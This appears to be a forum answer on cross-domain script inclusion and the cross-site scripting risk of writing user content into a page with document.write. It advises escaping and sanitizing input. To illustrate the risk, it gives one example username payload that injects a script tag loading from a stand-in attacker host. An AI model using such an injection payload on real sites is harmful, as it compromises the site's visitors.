There's no security issue with the fact that you're including a script from one domain onto a web page on another, as long as you control both domains. There are plenty of sites that serve their script tags from CDN or from content subdomains or whole other domains.
The use of document.write is obsolete and probably will cause you headaches.
The only security concerns you would have is if your API allows user content to be document.write'ed onto the page, as then you become vulnerable to cross site scripting attacks, where someone sets their username as something like this:
/><script>document.write('<script src="myevilpage.com"></script>'</script>
and then your code happily injects that onto the page and everyone who then visits it gets a virus and their computer explodes. Generally you will want to escape any user based input before sending it on your API, also sanitize it in your javascript and then insert it into the page as a textNode or similar trick to stop people being able to manipulate your page.